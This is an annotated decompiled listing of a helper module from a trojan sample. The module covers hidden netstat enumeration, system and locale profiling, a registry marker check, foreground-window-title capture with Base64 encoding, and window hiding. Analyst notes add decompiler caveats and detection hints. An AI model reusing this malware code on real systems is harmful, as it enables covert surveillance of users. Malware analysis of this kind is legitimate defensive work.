// Decompiled with JetBrains decompiler
// Type: n.API
// Assembly: n, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BFCF94BC-F711-4A63-941E-52FC7F306AC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Fsysna.wh-0adec5f2e37dcb28180512f882c1aec3a7f939bf33e4147587c7b7277719444b.exe
//
// Analyst notes (added in review):
// - This is decompiler output for a sample whose file name carries the label
//   Trojan.Win32.Fsysna.wh and a 64-hex-digit string (presumably its SHA-256).
// - The Microsoft.VisualBasic helpers (Strings, Conversions, ProjectData, MyProject)
//   indicate the original was written in VB.NET. Several locals below are read before
//   any assignment (flag, str3, enumerator, lpdwProcessID); that is a decompiler
//   artifact, so this listing is for reading, not for recompiling as-is.
// - B.PC and B.ver are referenced but defined in another type that is not shown here.
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.VisualBasic.MyServices;
using n.My;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Text;

namespace n
{
    // Helper module: host/connection enumeration, gzip and Base64 wrappers, and
    // user32/kernel32 P/Invoke declarations used by the rest of the sample.
    [StandardModule]
    internal sealed class API
    {
        // Declared but not referenced by name below; Gcc and Gc use the literal values
        // 1024U and 7U instead (the decompiler inlines constants).
        private const uint LOCALE_SYSTEM_DEFAULT = 1024;
        private const uint LOCALE_SABBREVCTRYNAME = 7;

        // Parses an array of text lines (Gt passes the output of "netstat -o") into one
        // string of "!"-separated records, each "<module or process name>:<pid>,f1,f2,f3,f4".
        // Parsing starts after the line containing "Local Address" and stops at the first
        // empty line, where the trailing "!" is trimmed and the result is stored.
        // NOTE(review): str1 is only assigned on that empty-line path; if no empty line
        // follows the table the method returns the unassigned value (presumably Nothing
        // in the VB original).
        public static string fx(ref Array A)
        {
            string str1;
            try
            {
                foreach (object obj in A)
                {
                    string str2 = Conversions.ToString(obj);
                    // Declared inside the loop by the decompiler; it is read on later
                    // iterations, so it was presumably a method-level local originally.
                    bool flag;
                    if (Strings.InStr(str2, "Local Address") > 0)
                        flag = true; // header row found: following lines are table rows
                    else if (flag)
                    {
                        // Accumulator across rows (same decompiler scoping caveat as flag).
                        string str3;
                        if (Operators.CompareString(str2, "", false) == 0)
                        {
                            // End of table: drop the final "!" separator.
                            str1 = Strings.Mid(str3, 1, str3.Length - 1);
                            break;
                        }
                        // NOTE(review): as printed here both literals are a single space,
                        // which would never terminate. The original presumably replaces two
                        // spaces with one; whitespace looks collapsed on this page. Confirm
                        // against the binary.
                        do
                        {
                            str2 = Strings.Replace(str2, " ", " ");
                        }
                        while (Strings.InStr(str2, " ") > 0);
                        // Strings.Split with no delimiter argument splits on a space.
                        // Presumably [0] is empty (rows start with a space) and [1]..[5] are
                        // protocol, local address, foreign address, state, PID. TODO confirm.
                        string[] strArray = Strings.Split(str2);
                        string str4;
                        try
                        {
                            // File name (last path component) of the owning process's main module.
                            str4 = Strings.Split(Process.GetProcessById(Conversions.ToInteger(strArray[5])).MainModule.FileName, "\\")[Strings.Split(Process.GetProcessById(Conversions.ToInteger(strArray[5])).MainModule.FileName, "\\").Length - 1] + ":" + strArray[5];
                        }
                        catch (Exception ex)
                        {
                            // Fallback when the module path cannot be read: use ProcessName.
                            ProjectData.SetProjectError(ex);
                            str4 = Process.GetProcessById(Conversions.ToInteger(strArray[5])).ProcessName + ":" + strArray[5];
                            ProjectData.ClearProjectError();
                        }
                        // In field [3] the local computer name is rewritten to 127.0.0.1.
                        str3 = str3 + str4 + "," + strArray[1] + "," + strArray[2] + "," + strArray[3].ToLower().Replace(MyProject.Computer.Name.ToLower(), "127.0.0.1") + "," + strArray[4] + "!";
                    }
                }
            }
            finally
            {
                // Decompiler rendering of the foreach enumerator cleanup.
                IEnumerator enumerator;
                if (enumerator is IDisposable)
                    (enumerator as IDisposable).Dispose();
            }
            return str1;
        }

        // Runs "netstat -o" through a windowless cmd process and returns fx's summary
        // of the output.
        // Detection note: the command is written to cmd's standard input, not passed as an
        // argument, so it will not appear on the cmd process command line. Telemetry for
        // this behaviour has to come from the process started by cmd or from the parent
        // and child relationship.
        public static string Gt()
        {
            Process process = Process.Start(new ProcessStartInfo()
            {
                UseShellExecute = false,
                RedirectStandardError = true,
                RedirectStandardInput = true,
                RedirectStandardOutput = true,
                WindowStyle = ProcessWindowStyle.Hidden,
                CreateNoWindow = true,
                FileName = "cmd"
            });
            process.StandardInput.WriteLine("netstat -o");
            process.StandardInput.WriteLine("exit");
            // Created but never read; the output is taken from process.StandardOutput below.
            StreamReader streamReader = new StreamReader(process.StandardOutput.BaseStream);
            Array A = (Array) Strings.Split(process.StandardOutput.ReadToEnd(), "\r\n");
            return API.fx(ref A);
        }

        // Gzip-compresses Byt when Compress is true, otherwise gzip-decompresses it.
        // Compress is passed by ref but only read.
        // Analyst caveats when reusing this to unpack captured data:
        // - The compress branch returns Length + 1 bytes, i.e. one trailing zero byte.
        // - The decompress branch takes the output size from 4 bytes at Length - 5 of the
        //   input. That lines up with the gzip size trailer only when the input carries
        //   the extra trailing byte described above. The value is not validated.
        // - Decompression uses a single Read call, which is not guaranteed to fill the buffer.
        public static byte[] ZIP(byte[] Byt, ref bool Compress)
        {
            if (Compress)
            {
                MemoryStream memoryStream = new MemoryStream();
                // leaveOpen = true so memoryStream can still be read after the gzip stream is disposed.
                GZipStream gzipStream = new GZipStream((Stream) memoryStream, CompressionMode.Compress, true);
                gzipStream.Write(Byt, 0, Byt.Length);
                gzipStream.Dispose();
                memoryStream.Position = 0L;
                byte[] buffer = new byte[(int) memoryStream.Length + 1];
                memoryStream.Read(buffer, 0, buffer.Length);
                memoryStream.Dispose();
                return buffer;
            }
            MemoryStream memoryStream1 = new MemoryStream(Byt);
            GZipStream gzipStream1 = new GZipStream((Stream) memoryStream1, CompressionMode.Decompress);
            byte[] buffer1 = new byte[4];
            memoryStream1.Position = memoryStream1.Length - 5L;
            memoryStream1.Read(buffer1, 0, 4);
            int int32 = BitConverter.ToInt32(buffer1, 0);
            memoryStream1.Position = 0L;
            // "int32 - 1 + 1" is how a VB array bound (upper index) decompiles; length is int32.
            byte[] array = new byte[int32 - 1 + 1];
            gzipStream1.Read(array, 0, int32);
            gzipStream1.Dispose();
            memoryStream1.Dispose();
            return array;
        }

        // Base64-encodes raw bytes.
        public static string FEN(byte[] data) => Convert.ToBase64String(data);

        // Decodes a Base64 string to raw bytes.
        public static byte[] FDE(string base64) => Convert.FromBase64String(base64);

        // Base64 of the UTF-8 bytes of s (s is by ref but only read).
        public static string ENB(ref string s) => Convert.ToBase64String(Encoding.UTF8.GetBytes(s));

        // Inverse of ENB: Base64-decode s and interpret the bytes as UTF-8.
        public static string DEB(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));

        // kernel32 GetLocaleInfo; fills lpLCData with the requested locale field.
        [DllImport("kernel32.dll")]
        private static extern int GetLocaleInfo(
            uint Locale,
            uint LCType,
            [Out] StringBuilder lpLCData,
            int cchData);

        // Queries locale field lInfo for locale 1024 (the value of LOCALE_SYSTEM_DEFAULT
        // above). Returns the text without its last counted character, or an empty string
        // when the call reports nothing.
        private static string Gcc(uint lInfo)
        {
            StringBuilder lpLCData = new StringBuilder(256);
            int localeInfo = API.GetLocaleInfo(1024U, lInfo, lpLCData, lpLCData.Capacity);
            return localeInfo > 0 ? lpLCData.ToString().Substring(0, localeInfo - 1) : string.Empty;
        }

        // Locale field 7 (the value of LOCALE_SABBREVCTRYNAME above): abbreviated country name.
        public static string Gc() => API.Gcc(7U);

        // Builds a multi-line host summary: B.PC, country abbreviation, OS full name,
        // a "Yes"/"No" marker, then B.ver. A field that throws is replaced by "X".
        // The marker is "Yes" when HKEY_CURRENT_USER has a value named exactly "p" at its
        // root (case-sensitive compare). What writes that value is not visible here;
        // presumably another part of the sample. It is a host artifact worth checking
        // during triage.
        public static string A0()
        {
            // Unused local; the registry is accessed via MyProject.Computer.Registry below.
            RegistryProxy registry = MyProject.Computer.Registry;
            string str1 = B.PC + "\r\n";
            string str2;
            try
            {
                str2 = str1 + API.Gc() + "\r\n";
            }
            catch (Exception ex)
            {
                ProjectData.SetProjectError(ex);
                str2 = str1 + "X\r\n";
                ProjectData.ClearProjectError();
            }
            string str3;
            try
            {
                str3 = str2 + MyProject.Computer.Info.OSFullName + "\r\n";
            }
            catch (Exception ex)
            {
                ProjectData.SetProjectError(ex);
                str3 = str2 + "X\r\n";
                ProjectData.ClearProjectError();
            }
            string str4;
            try
            {
                foreach (string valueName in MyProject.Computer.Registry.CurrentUser.GetValueNames())
                {
                    if (Operators.CompareString(valueName, "p", false) == 0)
                    {
                        str4 = str3 + "Yes\r\n";
                        goto label_12;
                    }
                }
            }
            catch (Exception ex)
            {
                // Registry errors are swallowed and fall through to "No".
                ProjectData.SetProjectError(ex);
                ProjectData.ClearProjectError();
            }
            str4 = str3 + "No\r\n";
            label_12:
            string Expression = str4 + B.ver;
            string str5;
            try
            {
                // Shortens the text: drops "Microsoft", "®" and "™", and turns "Windows"
                // into "Win". The replacements run over the whole report, not only the OS line.
                // NOTE(review): the last Replace shows " " -> " " on this page; presumably
                // two spaces to one originally (whitespace collapsed in extraction).
                str5 = Strings.Replace(Strings.Replace(Strings.Replace(Expression, "Microsoft", ""), "Windows", "Win").Replace("®", "").Replace("™", ""), " ", " ");
            }
            catch (Exception ex)
            {
                ProjectData.SetProjectError(ex);
                str5 = Expression + "X\r\n";
                ProjectData.ClearProjectError();
            }
            return str5 + "\r\n \r\n ";
        }

        // user32 imports used by A1 to read the foreground window's title and owner PID.
        [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
        public static extern IntPtr GetForegroundWindow();

        [DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern int GetWindowThreadProcessId(IntPtr hwnd, ref int lpdwProcessID);

        [DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern int GetWindowText(IntPtr hWnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string WinTitle, int MaxLength);

        // NOTE(review): hwnd is declared as long here while the other imports use IntPtr;
        // a window handle is pointer-sized, so this declaration does not match on 32-bit.
        [DllImport("user32.dll", EntryPoint = "GetWindowTextLengthA", CharSet = CharSet.Ansi, SetLastError = true)]
        private static extern int GetWindowTextLength(long hwnd);

        // Returns the title of the current foreground window, Base64-encoded via ENB, or
        // "" when there is no foreground window or anything throws. The parameter p is
        // never used in the body.
        // When an owning PID is reported, the title comes from that process's
        // MainWindowTitle; otherwise (or if that lookup throws) the GetWindowText result
        // is used.
        public static string A1(ref bool p)
        {
            string str1;
            try
            {
                IntPtr foregroundWindow = API.GetForegroundWindow();
                if (foregroundWindow == IntPtr.Zero)
                {
                    str1 = "";
                }
                else
                {
                    int windowTextLength = API.GetWindowTextLength((long) foregroundWindow);
                    // Pre-sized buffer of "*" characters that GetWindowText overwrites in place.
                    string str2 = Strings.StrDup(windowTextLength + 1, "*");
                    API.GetWindowText(foregroundWindow, ref str2, windowTextLength + 1);
                    int lpdwProcessID;
                    API.GetWindowThreadProcessId(foregroundWindow, ref lpdwProcessID);
                    if (lpdwProcessID == 0)
                    {
                        str1 = API.ENB(ref str2);
                    }
                    else
                    {
                        try
                        {
                            string mainWindowTitle = Process.GetProcessById(lpdwProcessID).MainWindowTitle;
                            str1 = API.ENB(ref mainWindowTitle);
                        }
                        catch (Exception ex)
                        {
                            ProjectData.SetProjectError(ex);
                            str1 = API.ENB(ref str2);
                            ProjectData.ClearProjectError();
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                ProjectData.SetProjectError(ex);
                str1 = "";
                ProjectData.ClearProjectError();
            }
            return str1;
        }

        // Thin wrapper around user32 ShowWindow. The constants correspond to ShowWindow's
        // nCmdShow values (0 hides a window, 9 restores it).
        public class wd
        {
            public const int HIDE = 0;
            public const int Normal = 1;
            public const int Minimized = 2;
            public const int Maximized = 3;
            public const int Show = 5;
            public const int RESTORE = 9;
            // Not referenced anywhere in this listing.
            public int hWnd;

            // Applies show-state A to window handle hwd. Both are by ref but only read.
            public static void G(ref int hwd, ref int A) => API.wd.ShowWindow(hwd, A);

            // Window handle declared as int rather than IntPtr.
            [DllImport("User32")]
            public static extern int ShowWindow(int hwnd, int nCmdShow);
        }
    }
}